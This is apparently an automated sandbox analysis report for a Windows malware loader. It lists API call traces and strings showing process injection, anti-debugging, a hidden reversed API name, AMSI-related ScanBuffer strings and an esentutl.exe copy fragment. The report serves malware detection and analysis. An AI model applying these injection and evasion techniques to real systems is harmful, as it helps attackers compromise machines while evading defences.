smartscreenps, xrefs: 02ED0055, 02ED0088, 02ED00BB
FlushInstructionCache, xrefs: 02EDABDC
ntdll, xrefs: 02ED922F, 02ED927F, 02ED9293, 02EDA62C, 02EDA65F, 02EDA692, 02EDA6C5, 02EDA6F8, 02EDAE99, 02EDAECC, 02EDAEFF, 02EDAF32, 02EDAF65, 02EDAF98, 02EDAFCB, 02EDAFFE, 02EDB031, 02EDB064, 02EDB097, 02EDB0CA, 02EDB0FD, 02EDB130, 02EDB163
UacScan, xrefs: 02ECF83A, 02ED00DD, 02ED01D5, 02ED07A4, 02ED138A, 02ED1968, 02ED22CA, 02ED29DD, 02ED3C32, 02ED5B93, 02ED6103, 02ED62C8, 02ED65EE, 02ED66FB, 02ED6959, 02ED6A51, 02ED75F4, 02ED7996, 02ED7BAD, 02ED7D40, 02ED7F94, 02ED8420, 02ED85A9, 02ED8702, 02ED88A8, 02ED8A35, 02ED8BC9, 02ED8D48, 02ED8FBF, 02ED942D, 02ED9647, 02ED9828, 02ED99C1, 02ED9BF7, 02EDAA67
C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02ED64AE
dbgcore, xrefs: 02ED9257, 02ED926B
psapi, xrefs: 02EDA9F7
NtMapViewOfSection, xrefs: 02EDAF81
NtOpenObjectAuditAlarm, xrefs: 02ED922A
CryptSIPVerifyIndirectData, xrefs: 02ECFDCB, 02EDA17F
Initialize, xrefs: 02ECF902, 02ED0820, 02ED09B4, 02ED0B52, 02ED0CF8, 02ED0FAD, 02ED1650, 02ED1A8C, 02ED1F36, 02ED2040, 02ED2727, 02ED2A59, 02ED2D79, 02ED30AD, 02ED325B, 02ED3587, 02ED3940, 02ED587A, 02ED5C0F, 02ED600B, 02ED61D0, 02ED643C, 02ED6572, 02ED6777, 02ED76EC, 02ED83A4, 02ED93B1, 02ED9FC1, 02EDA35F, 02EDA88E, 02EDAC48, 02EDB194
I_QueryTagInformation, xrefs: 02ED923E
OpenProcess, xrefs: 02EDAB76
CreateProcessAsUserW, xrefs: 02EDAA2E, 02EDAA4C
[InternetShortcut], xrefs: 02ED6D4C
BCryptRegisterProvider, xrefs: 02ECFF13
NtOpenSection, xrefs: 02EDAF1B
http, xrefs: 02ED212C
SLGetEncryptedPIDEx, xrefs: 02EDAE4F
DlpCheckIsCloudSyncApp, xrefs: 02EDA484
endpointdlp, xrefs: 02EDA468, 02EDA49B, 02EDA4CE, 02EDA501
EnumServicesStatusW, xrefs: 02EDA9C5
SLGetGenuineInformation, xrefs: 02ED9E73
WinHttp.WinHttpRequest.5.1, xrefs: 02ED2340
Kernel32, xrefs: 02EDAA06, 02EDAA15, 02EDAA51
LdrGetProcedureAddress, xrefs: 02EDB080
ieproxy, xrefs: 02ECFB18, 02ECFB3F, 02ECFB6F
Advapi, xrefs: 02EDA9BB, 02EDA9CA, 02EDA9D9, 02EDA9E8, 02EDAA24, 02EDAA33, 02EDAA42
EnumServicesStatusA, xrefs: 02EDA9B6
CreateProcessA, xrefs: 02EDAA01
wintrust, xrefs: 02ECFC1E, 02ECFC51, 02ECFC84
VirtualProtect, xrefs: 02EDAB43
NtWaitForSingleObject, xrefs: 02EDA67B
C:\Windows\System32\, xrefs: 02ED040E, 02ED796F, 02ED86B7
SetUnhandledExceptionFilter, xrefs: 02EDAC0F
psapi, xrefs: 02EDA163
DllGetClassObject, xrefs: 02ECFB07, 02ED003E, 02EDA119, 02EDADE9
NtDeviceIoControlFile, xrefs: 02EDA989
CryptSIPGetSignedDataMsg, xrefs: 02ECFDFE
NtSetSecurityObject, xrefs: 02ED927A
CryptSIPGetInfo, xrefs: 02ECFD98
SLIsGenuineLocalEx, xrefs: 02ED9ED9
GET, xrefs: 02ED2459
sppwmi, xrefs: 02EDAE00
SLGetSLIDList, xrefs: 02ED9EA6
MZP, xrefs: 02ED9996
IconIndex=, xrefs: 02ED6DB1
RtlAllocateHeap, xrefs: 02EDA648, 02EDA6AE
/d , xrefs: 02ED64B9
HotKey=, xrefs: 02ED6EE5
RetailTracerEnable, xrefs: 02EDA0B3

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: File$Module$AddressAttributesHandleProc$CheckCloseCreateDebuggerDirectoryInetInformationNameOfflineOpenPresentQueryReadRemote
String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
API String ID: 633443117-2644593349
Opcode ID: 801977a73231d5fc602b2c3cf8da324e7a7439c19e0e3b1d79d0f5c0129191ed
Instruction ID: 5586ac09c4d1d0357459f04ceb594ee11545345ffa15f413673ddc57f76b8c4e
Opcode Fuzzy Hash: 801977a73231d5fc602b2c3cf8da324e7a7439c19e0e3b1d79d0f5c0129191ed
Instruction Fuzzy Hash: 9114FF34A8012D8BDB12EB64D991ADF73BAFF85304F10D1A9F409AB255DB30AE42CF55

Function 02ECB11C Relevance: 52.6, APIs: 7, Strings: 22, Instructions: 1829
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll,NtOpenProcess,UacScan,02F37380,02ECCFC4,ScanString,02F37380,02ECCFC4,ScanBuffer,02F37380,02ECCFC4,ScanString,02F37380,02ECCFC4,UacScan,02F37380), ref: 02ECB3EE

Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9

NtOpenProcess.NTDLL(02F37584,001F0FFF,02F37318,02F37330), ref: 02ECB4EC

Part of subcall function 02EB2EE0: QueryPerformanceCounter.KERNEL32 ref: 02EB2EE4

GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,00000078,00000000,00000000), ref: 02ECB7CA

Part of subcall function 02EC7A3C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02EC7AAF

IsBadReadPtr.KERNEL32(16260000,00000040), ref: 02ECB963
IsBadReadPtr.KERNEL32(?,000000F8), ref: 02ECB990

Part of subcall function 02EC7D88: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02EC7DFC

GetModuleHandleW.KERNEL32(ntdll,NtCreateThreadEx,UacScan,02F37380,02ECCFC4,ScanString,02F37380,02ECCFC4,048E0000,048E0000,16580000,1FD45251,02F37588,OpenSession,02F37380,02ECCFC4), ref: 02ECC80C
NtCreateThreadEx.NTDLL(02F37560,02000000,02F37318,048E15CE,048E15CE,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,02F37380,02ECCFC4,UacInitialize,02F37380), ref: 02ECCA1D

Part of subcall function 02EC895C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,UacScan), ref: 02EC8970
Part of subcall function 02EC895C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02EC898A
Part of subcall function 02EC895C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize), ref: 02EC89C6

Strings

NtCreateThreadEx, xrefs: 02ECC802
NtOpenProcess, xrefs: 02ECB3E4, 02ECCD1C, 02ECCEE6
I_QueryTagInformation, xrefs: 02ECCB94, 02ECCEC4
Initialize, xrefs: 02ECB152, 02ECB6D6, 02ECCBCE
bcrypt, xrefs: 02ECCDA3, 02ECCDB4, 02ECCDC5
advapi32, xrefs: 02ECCB99, 02ECCEC9
BCryptQueryProviderRegistration, xrefs: 02ECCDAF
NtReadVirtualMemory, xrefs: 02ECCB83
MiniDumpReadDumpStream, xrefs: 02ECCBB6
dbgcore, xrefs: 02ECCBAA, 02ECCBBB
OpenSession, xrefs: 02ECB1AB, 02ECB56A, 02ECB7E1, 02ECBA6F, 02ECBB7A, 02ECBCDA, 02ECBECE, 02ECC060, 02ECC159, 02ECC2E3, 02ECC3E0, 02ECC697, 02ECC8A5, 02ECCA26, 02ECCC1D, 02ECCE49
UacInitialize, xrefs: 02ECB4F9, 02ECB665, 02ECB852, 02ECB9FE, 02ECBBEB, 02ECBDBC, 02ECBF7E, 02ECC0E8, 02ECC272, 02ECC626, 02ECC916, 02ECCEFE
ntdll, xrefs: 02ECCB77, 02ECCB88, 02ECCD10, 02ECCD21, 02ECCEB8, 02ECCEDA, 02ECCEEB
MiniDumpWriteDump, xrefs: 02ECCBA5
NtOpenObjectAuditAlarm, xrefs: 02ECCB72, 02ECCEB3
BCryptRegisterProvider, xrefs: 02ECCDC0
BCryptVerifySignature, xrefs: 02ECCD9E
ScanString, xrefs: 02ECB25D, 02ECB339, 02ECC544, 02ECC727, 02ECCA97, 02ECCDD8
UacScan, xrefs: 02ECB204, 02ECB392, 02ECB405, 02ECBE5D, 02ECC5B5, 02ECC798, 02ECC826, 02ECCB08, 02ECCCBB, 02ECCD34
NtSetSecurityObject, xrefs: 02ECCD0B, 02ECCED5
ntdll, xrefs: 02ECB3E9, 02ECC807
ScanBuffer, xrefs: 02ECB2BA, 02ECB470, 02ECB5DB, 02ECB747, 02ECB8C3, 02ECBAE0, 02ECBC5C, 02ECBD4B, 02ECBFEF, 02ECC1CA, 02ECC354, 02ECC451, 02ECC4D3, 02ECC987, 02ECCC6C

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AddressHandleModuleProc$LibraryMemoryProcessReadVirtual$AllocateCounterCreateCurrentFreeLoadOpenPerformanceQueryThreadWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$ntdll
API String ID: 321279507-1870492900
Opcode ID: 0f95d3231df0e8a99e264d5cec9542f057e4387ad8de14ee59d9162104bcf211
Instruction ID: 6598ad9ba21e926d78bc80db57bcfb8c5f4cbd1aee04a7db094b481b53d761e3
Opcode Fuzzy Hash: 0f95d3231df0e8a99e264d5cec9542f057e4387ad8de14ee59d9162104bcf211
Instruction Fuzzy Hash: BBF2F535B801599BDB12FBA4DD91BDFB3F6AF45300F20E1A6B048AB655DA309E42CF41

Function 02EB5ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02EB0000,02EDE790), ref: 02EB5AE8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EB0000,02EDE790), ref: 02EB5B06
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EB0000,02EDE790), ref: 02EB5B24
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02EB5B42
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02EB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02EB5B8B
RegQueryValueExA.ADVAPI32(?,02EB5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02EB5BD1,?,80000001), ref: 02EB5BA9
RegCloseKey.ADVAPI32(?,02EB5BD8,00000000,?,?,00000000,02EB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02EB5BCB
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02EB5BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02EB5BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02EB5BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02EB5C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EB5C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EB5C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EB5CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EB5CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02EB5CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02EB5CEB

Strings

Software\Borland\Delphi\Locales, xrefs: 02EB5B38
Software\Borland\Locales, xrefs: 02EB5AFC, 02EB5B1A

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: b309eb5f4fdbb8956266ff5bcfbfaa2c35321493f6c4efcfcd0d4d774be191fc
Instruction ID: 9843e7f3d82e51b48dfb62cb70791746bd5f5591b56257b7ace44a7e820c0ddd
Opcode Fuzzy Hash: b309eb5f4fdbb8956266ff5bcfbfaa2c35321493f6c4efcfcd0d4d774be191fc
Instruction Fuzzy Hash: FE51D871E8025C7EFB26D6A4CC56FEF77AD9F04344F8091A1BA08E6181EB749A448F60

Function 02EC895C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,UacScan), ref: 02EC8970
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02EC898A
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize), ref: 02EC89C6

Part of subcall function 02EC7D88: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02EC7DFC

Strings

bcrypt, xrefs: 02EC896F
BCryptVerifySignature, xrefs: 02EC8983

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 1c13862597e16948c3a4aae1812f8250af36ccd1b46b9f9a5c9385a0ec05922c
Instruction ID: 9f3243277d32d670d9df9fe512e3dff7b2b1ae18da53c48af54601560e0c9b84
Opcode Fuzzy Hash: 1c13862597e16948c3a4aae1812f8250af36ccd1b46b9f9a5c9385a0ec05922c
Instruction Fuzzy Hash: 1CF0A9F1AC0308EEE311BBB9AE49B97F79EDB87798F00586AF90887140C2715850CB60

Function 02ECF748 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 02ECF758
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02ECF76A
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02ECF781

Strings

CheckRemoteDebuggerPresent, xrefs: 02ECF764
KernelBase, xrefs: 02ECF753

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 998e83af3abce510b6378e7e50cfbba24b9b0566e8d1ad1a6a37d38ac458f324
Instruction ID: 9c190732545ce1c889dc58a61f1444da7b32f57ebe0ecc3eb3178797ec5a4bd8
Opcode Fuzzy Hash: 998e83af3abce510b6378e7e50cfbba24b9b0566e8d1ad1a6a37d38ac458f324
Instruction Fuzzy Hash: 26F0273094034CAADB10A7F889887DCFBAA4B0932CF3493A9A430710C0E7711240C655

Function 02ECDD74 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02EB4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02EB4F2E

RtlD.N(00000000,?,00000000,00000000,00000000,02ECDE44), ref: 02ECDDAF
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02ECDE44), ref: 02ECDDDF
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02ECDDF4
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02ECDE20
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02ECDE29

Part of subcall function 02EB4C60: SysFreeString.OLEAUT32(02ECF4A8), ref: 02EB4C6E

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: File$String$AllocCloseFreeInformationOpenQueryRead
String ID:
API String ID: 2659941336-0
Opcode ID: 791e271a119b8057a7b2d152bd98ff873f959bf64df79dec9e88822130ab9a97
Instruction ID: c18b50ffda6f62d05ec6f6756a6a851b587b3a013cbfb09e4ccc9bfe0fa49d64
Opcode Fuzzy Hash: 791e271a119b8057a7b2d152bd98ff873f959bf64df79dec9e88822130ab9a97
Instruction Fuzzy Hash: 86210375A802187EEB12EAD4CD52FDFB7BDEF48B00F505465B600F71C1DAB4AA058B54

Function 02ECE4BC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02ECE5FA

Strings

ScanBuffer, xrefs: 02ECE543
Initialize, xrefs: 02ECE4EA
OpenSession, xrefs: 02ECE59C

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 4576b56af97537aca88b959e2da76ccecdd23b1fff1334428db2ad06523e0390
Instruction ID: 9bd99a2da2b6aa356bc8808dafd7634f667e04f7fa71b7f63c4be30d0621b936
Opcode Fuzzy Hash: 4576b56af97537aca88b959e2da76ccecdd23b1fff1334428db2ad06523e0390
Instruction Fuzzy Hash: E3411275B901499BEB02FBE4D951ADF73FAEF88700F60E425F041A7286DA74AD028F51

Function 02ECDC90 Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02EB4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02EB4F2E

RtlD.N(00000000,?,00000000,00000000,00000000,02ECDD62), ref: 02ECDCCF
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02ECDD09
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02ECDD36
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02ECDD3F

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: File$AllocCloseCreateStringWrite
String ID:
API String ID: 3308905243-0
Opcode ID: 289a63fbbbac0fc68b0806475ad0e51ebc15d3602f5c17539d95ac5a01a38f3b
Instruction ID: 9ad1d0c5fab2c81a49bd96e3fe2de6f2aa512da70d9fb31ce04abe97805522f5
Opcode Fuzzy Hash: 289a63fbbbac0fc68b0806475ad0e51ebc15d3602f5c17539d95ac5a01a38f3b
Instruction Fuzzy Hash: 6821E071A80208BAEB11EAD0CD52FDEB7BDDF05B00F609465B600F71C0D7B4BE058A64

Function 02EC7A3A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E

Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02EC7AAF

Strings

ntdll, xrefs: 02EC7A84
yromeMlautriVetacollAwZ, xrefs: 02EC7A57

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

